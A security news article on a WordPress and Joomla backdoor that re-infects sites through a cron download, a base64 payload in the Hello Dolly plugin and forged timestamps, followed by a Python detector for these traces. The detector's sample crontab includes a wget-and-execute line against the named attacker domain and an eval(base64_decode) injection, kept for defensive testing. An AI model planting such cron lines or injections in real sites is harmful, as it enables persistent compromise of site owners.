Source: Cyware | By Ryan Stewart
• Depending on the type of platform, the malware determines the method it will use to further infect the website files.
• The malware operators are propagating the malware through hestonsflorists[.]com.
A new backdoor malware has been found re-infecting files even after website owners have cleaned their websites. It primarily targets WordPress-based and Joomla-based websites to initiate its infection process.
What’s new about the malware?
In its latest blog post, Sucuri has mentioned that the malware’s persistence on a website was “being created by a cron that was scheduled to download malware from a third party domain.”
The malware’s source code is configured to detect only WordPress-based and Joomla-based websites. Depending on the type of platform, the malware determines the method it will use to further infect the website files.
How does it operate?
Sucuri researchers cited an instance in which one of its clients had been affected by a persistent malware infection. The client’s website was running WordPress, and the malware abused the default ‘Hello Dolly’ WordPress plugin to further its infection process.
“The malware proceeded to preserve the existing timestamps of the default WordPress plugin “Hello, Dolly”, then attempts to hide base64 encoded malware to the plugin file ./wp-content/plugins/hello.php,” said the Sucuri researchers in a blog post.
The backdoor maintained its foothold on the website despite the cleanup process.
Over a span of 5-8 years, the malware operators have changed the domain used to distribute the malware. They have moved from the old hestonsflorist[.]com domain to the current hestonsflorists[.]com domain to propagate the malware.
“The attackers even assign the same fake timestamp (201104202045) using touch to try and trick webmasters — which nowadays would probably be even more suspicious, since the fake timestamp reflects a date over 8 years old,” added the researchers.
Researchers further note that the malicious files of this backdoor are served from the /tmp directory, which is rarely scanned or monitored, making the infection difficult to detect.
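As an added example (not code from the Cyware article or from Sucuri), the following Python script checks a site for the three traces described above: a cron entry that re-downloads a payload from an external domain and stages it in /tmp, a base64-encoded payload injected into the ‘Hello Dolly’ plugin file, and a file whose modification time was forced to the fake stamp 201104202045 with `touch`. The domain names and the timestamp are taken from the article; the function names, the cron schedule, the URL path and the plugin contents are assumptions constructed for this example.

```python
"""
Added example, not Sucuri's or Cyware's code: a read-only checker for the three
persistence traits the article describes. The domain names and the timestamp
come from the article; the function names, the cron schedule, the URL path and
the plugin contents are constructed for this example.
"""
import base64
import binascii
import re
from datetime import datetime

# Forged stamp from the article, in `touch -t` format (YYYYMMDDhhmm).
FAKE_TOUCH_STAMP = "201104202045"
FAKE_MTIME = datetime.strptime(FAKE_TOUCH_STAMP, "%Y%m%d%H%M")
BENIGN_MTIME = datetime(2024, 1, 15, 9, 30)  # constructed, for the clean case

# Distribution domains named in the article (old and current).
KNOWN_BAD_DOMAINS = {"hestonsflorist.com", "hestonsflorists.com"}

# A cron command line that fetches something over HTTP(S); captures the host and
# accepts the defanged "[.]" form so IoC lists can be pasted in as-is.
CRON_FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://([A-Za-z0-9.\-\[\]]+)")

# A long base64 literal handed straight to base64_decode(); the stock
# Hello Dolly plugin has no reason to call base64_decode at all.
BASE64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{40,})['\"]\s*\)")


def suspicious_cron_entries(crontab_text: str) -> list:
    """Flag cron lines that download from a remote host; note /tmp staging too."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_FETCH_RE.search(line)
        if m:
            host = m.group(1).replace("[.]", ".").lower()
            hits.append({"host": host, "known_bad": host in KNOWN_BAD_DOMAINS,
                         "stages_in_tmp": "/tmp/" in line, "line": line})
    return hits


def hidden_payloads(php_source: str) -> list:
    """Decode long base64 literals passed to base64_decode() and return previews."""
    findings = []
    for m in BASE64_LITERAL_RE.finditer(php_source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            continue  # not valid base64, so not a decodable payload
        findings.append({"offset": m.start(),
                         "decoded_preview": decoded[:60].decode("utf-8", "replace")})
    return findings


def has_fake_timestamp(mtime: datetime) -> bool:
    """True when a file's mtime equals the forged stamp from the article."""
    return mtime == FAKE_MTIME


def scan(crontab_text: str, plugin_source: str, plugin_mtime: datetime) -> dict:
    """Combine the three checks into one report for a single site."""
    cron_hits = suspicious_cron_entries(crontab_text)
    payloads = hidden_payloads(plugin_source)
    fake_ts = has_fake_timestamp(plugin_mtime)
    return {
        "cron_downloads": cron_hits,
        "cron_known_bad_domain": any(h["known_bad"] for h in cron_hits),
        "plugin_payloads": payloads,
        "plugin_fake_timestamp": fake_ts,
        "infected": bool(cron_hits or payloads or fake_ts),
    }


# --- constructed samples (not real captures) ---------------------------------
SAMPLE_CRONTAB = """\
*/10 * * * * wget -q -O /tmp/.x http://hestonsflorists[.]com/example-payload && php /tmp/.x
0 3 * * * find /var/www/html/wp-content/cache -mtime +7 -delete
"""
CLEAN_PLUGIN = "<?php\n/**\n * Plugin Name: Hello Dolly\n */\nfunction hello_dolly() { echo 'Hello'; }\n"
_INJECTED = base64.b64encode(b'<?php echo "constructed sample"; ?>').decode()
INFECTED_PLUGIN = CLEAN_PLUGIN + f"eval(base64_decode('{_INJECTED}'));\n"


def scan_samples() -> tuple:
    """Run the checks on the infected and the clean constructed samples."""
    return (scan(SAMPLE_CRONTAB, INFECTED_PLUGIN, FAKE_MTIME),
            scan("", CLEAN_PLUGIN, BENIGN_MTIME))


if __name__ == "__main__":
    for label, report in zip(("infected", "clean"), scan_samples()):
        print(label, "infected =", report["infected"])
        print(report)
```

In practice the crontab text would come from the web user's crontab and any `/etc/cron.*` entries, the plugin source from `./wp-content/plugins/hello.php`, and the mtime from `os.stat` on that file; the timestamp check matters because a cleanup that only compares modification times against a known-good baseline would be fooled by the `touch`-forged stamp the article describes.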